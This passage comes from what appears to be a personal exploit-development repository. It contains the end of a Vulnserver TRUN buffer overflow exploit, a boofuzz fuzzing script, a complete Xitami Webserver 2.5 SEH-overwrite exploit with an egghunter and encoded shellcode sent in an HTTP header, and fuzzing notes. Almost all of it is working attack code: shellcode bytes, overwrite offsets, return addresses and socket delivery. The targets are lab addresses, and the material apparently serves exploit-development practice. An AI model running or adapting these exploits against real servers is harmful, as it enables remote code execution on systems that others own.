shellcode += "\x6c\x92\xca\x29\x34\x40\x72\x68\x90\x27\x8b\x6a" 27 | shellcode += "\x7b\x97\x29\xe1\x96\xcc\x43\xa8\xfe\x21\x6e\x52" 28 | shellcode += "\xff\x2d\xf9\x21\xcd\xf2\x51\xad\x7d\x7a\x7c\x2a" 29 | shellcode += "\x81\x51\x38\xa4\x7c\x5a\x39\xed\xba\x0e\x69\x85" 30 | shellcode += "\x6b\x2f\xe2\x55\x93\xfa\xa5\x05\x3b\x55\x06\xf5" 31 | shellcode += "\xfb\x05\xee\x1f\xf4\x7a\x0e\x20\xde\x12\xa5\xdb" 32 | shellcode += "\x89\xdc\x92\xe2\x23\xb5\xe0\xe4\xa9\x2a\x6c\x02" 33 | shellcode += "\xa7\xa4\x38\x9d\x50\x5c\x61\x55\xc0\xa1\xbf\x10" 34 | shellcode += "\xc2\x2a\x4c\xe5\x8d\xda\x39\xf5\x7a\x2b\x74\xa7" 35 | shellcode += "\x2d\x34\xa2\xcf\xb2\xa7\x29\x0f\xbc\xdb\xe5\x58" 36 | shellcode += "\xe9\x2a\xfc\x0c\x07\x14\x56\x32\xda\xc0\x91\xf6" 37 | shellcode += "\x01\x31\x1f\xf7\xc4\x0d\x3b\xe7\x10\x8d\x07\x53" 38 | shellcode += "\xcd\xd8\xd1\x0d\xab\xb2\x93\xe7\x65\x68\x7a\x6f" 39 | shellcode += "\xf3\x42\xbd\xe9\xfc\x8e\x4b\x15\x4c\x67\x0a\x2a" 40 | shellcode += "\x61\xef\x9a\x53\x9f\x8f\x65\x8e\x1b\xbf\x2f\x92" 41 | shellcode += "\x0a\x28\xf6\x47\x0f\x35\x09\xb2\x4c\x40\x8a\x36" 42 | shellcode += "\x2d\xb7\x92\x33\x28\xf3\x14\xa8\x40\x6c\xf1\xce" 43 | shellcode += "\xf7\x8d\xd0" 44 | 45 | buffer = "TRUN /.:/" + "A" * 2003 46 | # eip: 77E9F8F7 47 | buffer += "\xF7\xF8\xE9\x77" 48 | buffer += "\x90" * 30 49 | buffer += shellcode 50 | 51 | try: 52 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 53 | connect = s.connect((host, port)) 54 | s.send(buffer) 55 | s.close() 56 | 57 | except: 58 | print '\nCannot connect to the server!' 59 | -------------------------------------------------------------------------------- /Vulnserver/trun-fuzz.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | from boofuzz import * 4 | 5 | host = '192.168.1.9' #windows VM 6 | port = 9999 #vulnserver port 7 | 8 | def main(): 9 | session = Session(target = Target(connection = SocketConnection(host, port, proto='tcp'))) 10 | 11 | s_initialize("TRUN") 12 | s_string("TRUN", fuzzable = False) 13 | s_delim(" ", fuzzable = False) 14 | s_string("FUZZ") 15 | 16 | session.connect(s_get("TRUN")) 17 | session.fuzz() 18 | 19 | if __name__ == "__main__": 20 | main() 21 | -------------------------------------------------------------------------------- /Xitami Webserver 2.5/exploit.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | import socket, sys, os 4 | 5 | 6 | ip = "192.168.1.9" 7 | port = 80 8 | 9 | 10 | egghunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x6b\x61\x6c\x69\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7" 11 | 12 | #offset = "A"* 254 + egghunter + "A"*(304-254-32) 13 | offset = "A"*254 + egghunter + "A"*(304-254-32) 14 | nseh = "\xeb\xcc\x90\x90" 15 | seh = "\x57\xf8\x44" # pop-pop-ret 0x0044f857 16 | 17 | egg = "kalikali" 18 | shellcode = "" 19 | shellcode += "\x89\xe3\xdb\xc9\xd9\x73\xf4\x58\x50\x59\x49\x49" 20 | shellcode += "\x49\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43" 21 | shellcode += "\x43\x43\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30" 22 | shellcode += "\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30" 23 | shellcode += "\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49" 24 | shellcode += "\x39\x6c\x79\x78\x6d\x52\x45\x50\x73\x30\x77\x70" 25 | shellcode += "\x43\x50\x6d\x59\x6d\x35\x30\x31\x6b\x70\x31\x74" 26 | shellcode += "\x6e\x6b\x62\x70\x36\x50\x6c\x4b\x76\x32\x54\x4c" 27 | shellcode += "\x6c\x4b\x73\x62\x46\x74\x6c\x4b\x70\x72\x74\x68" 28 | shellcode += "\x56\x6f\x38\x37\x61\x5a\x67\x56\x35\x61\x59\x6f" 29 | shellcode += "\x4c\x6c\x37\x4c\x75\x31\x61\x6c\x36\x62\x44\x6c" 30 | shellcode += "\x65\x70\x6b\x71\x4a\x6f\x54\x4d\x36\x61\x5a\x67" 31 | shellcode += "\x39\x72\x6a\x52\x33\x62\x70\x57\x6e\x6b\x62\x72" 32 | shellcode += "\x52\x30\x6e\x6b\x73\x7a\x35\x6c\x6c\x4b\x32\x6c" 33 | shellcode += "\x47\x61\x34\x38\x5a\x43\x52\x68\x55\x51\x48\x51" 34 | shellcode += "\x66\x31\x4c\x4b\x50\x59\x77\x50\x37\x71\x68\x53" 35 | shellcode += "\x4e\x6b\x70\x49\x52\x38\x39\x73\x36\x5a\x63\x79" 36 | shellcode += "\x4c\x4b\x45\x64\x6e\x6b\x57\x71\x4a\x76\x74\x71" 37 | shellcode += "\x79\x6f\x6e\x4c\x59\x51\x7a\x6f\x76\x6d\x56\x61" 38 | shellcode += "\x4a\x67\x57\x48\x4b\x50\x34\x35\x7a\x56\x44\x43" 39 | shellcode += "\x31\x6d\x6a\x58\x45\x6b\x71\x6d\x67\x54\x43\x45" 40 | shellcode += "\x48\x64\x71\x48\x4e\x6b\x52\x78\x67\x54\x43\x31" 41 | shellcode += "\x58\x53\x33\x56\x6c\x4b\x44\x4c\x32\x6b\x4c\x4b" 42 | shellcode += "\x36\x38\x35\x4c\x73\x31\x58\x53\x4e\x6b\x55\x54" 43 | shellcode += "\x6c\x4b\x45\x51\x7a\x70\x4e\x69\x62\x64\x54\x64" 44 | shellcode += "\x64\x64\x63\x6b\x53\x6b\x75\x31\x33\x69\x73\x6a" 45 | shellcode += "\x33\x61\x69\x6f\x59\x70\x61\x4f\x61\x4f\x72\x7a" 46 | shellcode += "\x6c\x4b\x54\x52\x48\x6b\x4c\x4d\x53\x6d\x52\x48" 47 | shellcode += "\x45\x63\x37\x42\x65\x50\x35\x50\x65\x38\x50\x77" 48 | shellcode += "\x44\x33\x50\x32\x31\x4f\x46\x34\x43\x58\x30\x4c" 49 | shellcode += "\x31\x67\x61\x36\x36\x67\x6b\x4f\x4e\x35\x4e\x58" 50 | shellcode += "\x6c\x50\x67\x71\x55\x50\x65\x50\x36\x49\x49\x54" 51 | shellcode += "\x62\x74\x36\x30\x35\x38\x67\x59\x6b\x30\x52\x4b" 52 | shellcode += "\x73\x30\x79\x6f\x6a\x75\x66\x30\x36\x30\x36\x30" 53 | shellcode += "\x76\x30\x63\x70\x66\x30\x37\x30\x52\x70\x55\x38" 54 | shellcode += "\x49\x7a\x36\x6f\x39\x4f\x69\x70\x69\x6f\x4e\x35" 55 | shellcode += "\x4c\x57\x32\x4a\x66\x65\x50\x68\x59\x50\x4f\x58" 56 | shellcode += "\x65\x51\x57\x78\x63\x58\x47\x72\x77\x70\x71\x32" 57 | shellcode += "\x6c\x78\x6c\x49\x4d\x36\x51\x7a\x76\x70\x62\x76" 58 | shellcode += "\x70\x57\x70\x68\x6d\x49\x79\x35\x72\x54\x50\x61" 59 | shellcode += "\x39\x6f\x58\x55\x6c\x45\x59\x50\x42\x54\x64\x4c" 60 | shellcode += "\x79\x6f\x42\x6e\x44\x48\x72\x55\x78\x6c\x70\x68" 61 | shellcode += "\x6c\x30\x6e\x55\x4e\x42\x76\x36\x69\x6f\x78\x55" 62 | shellcode += "\x62\x48\x63\x53\x32\x4d\x45\x34\x47\x70\x4d\x59" 63 | shellcode += "\x38\x63\x73\x67\x42\x77\x72\x77\x64\x71\x6b\x46" 64 | shellcode += "\x30\x6a\x37\x62\x36\x39\x50\x56\x6a\x42\x39\x6d" 65 | shellcode += "\x71\x76\x5a\x67\x53\x74\x37\x54\x67\x4c\x77\x71" 66 | shellcode += "\x73\x31\x6c\x4d\x62\x64\x54\x64\x76\x70\x6b\x76" 67 | shellcode += "\x63\x30\x61\x54\x36\x34\x52\x70\x31\x46\x70\x56" 68 | shellcode += "\x63\x66\x72\x66\x43\x66\x50\x4e\x32\x76\x66\x36" 69 | shellcode += "\x66\x33\x36\x36\x65\x38\x34\x39\x48\x4c\x35\x6f" 70 | shellcode += "\x6e\x66\x4b\x4f\x7a\x75\x6d\x59\x6d\x30\x62\x6e" 71 | shellcode += "\x61\x46\x42\x66\x69\x6f\x76\x50\x63\x58\x56\x68" 72 | shellcode += "\x4f\x77\x37\x6d\x75\x30\x49\x6f\x4b\x65\x6f\x4b" 73 | shellcode += "\x58\x70\x6c\x75\x4d\x72\x76\x36\x72\x48\x39\x36" 74 | shellcode += "\x6a\x35\x4f\x4d\x4d\x4d\x6b\x4f\x4b\x65\x37\x4c" 75 | shellcode += "\x44\x46\x61\x6c\x34\x4a\x6d\x50\x4b\x4b\x49\x70" 76 | shellcode += "\x64\x35\x34\x45\x6f\x4b\x31\x57\x46\x73\x51\x62" 77 | shellcode += "\x72\x4f\x52\x4a\x57\x70\x71\x43\x59\x6f\x4b\x65" 78 | shellcode += "\x41\x41" 79 | 80 | stage1 = offset + nseh + seh 81 | stage2 = egg + shellcode 82 | 83 | request = "" 84 | request += "GET / HTTP/1.1\r\n" 85 | request += "Host: 192.168.1.9" + stage2 + "\r\n" 86 | request += "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0\r\n" 87 | request += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n" 88 | request += "Accept-Language: en-US,en;q=0.5\r\n" 89 | request += "Accept-Encoding: gzip, deflate\r\n" 90 | request += "Connection: close\r\n" 91 | request += "Upgrade-Insecure-Requests: 1\r\n" 92 | request += "If-Modified-Since: Thu, " + stage1 + "\r\n\r\n" 93 | 94 | 95 | s = socket.socket(socket.AF_INET,socket.SOCK_STREAM) 96 | s.connect((ip,port)) 97 | s.send(request) 98 | s.close() 99 | -------------------------------------------------------------------------------- /Xitami Webserver 2.5/fuzz: -------------------------------------------------------------------------------- 1 | GET / HTTP/1.1 2 | Host: 192.168.1.9 3 | User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0 4 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 5 | Accept-Language: en-US,en;q=0.5 6 | Accept-Encoding: gzip, deflate 7 | Connection: close 8 | Upgrade-Insecure-Requests: 1 9 | If-Modified-Since: Thu, 22 Jul 2004 13:42:56 GMT 10 | Cache-Control: max-age=0 11 | 12 | Create a fuzzing script with boo-gen using HTTP request 13 | python boo-gen.py get.txt 14 | 15 | Vulnerable: 16 | If-Modified-Since: Wed, 17 | 18 | s_string("If-Modified-Since: Sat,", name="If-Modified-Since", fuzzable = False) 19 | s_delim(" ", name="space-10", fuzzable = False) 20 | s_string("15 Jun 2019 01:36:09 GMT", name="If-Modified-Since-Value") 21 | --------------------------------------------------------------------------------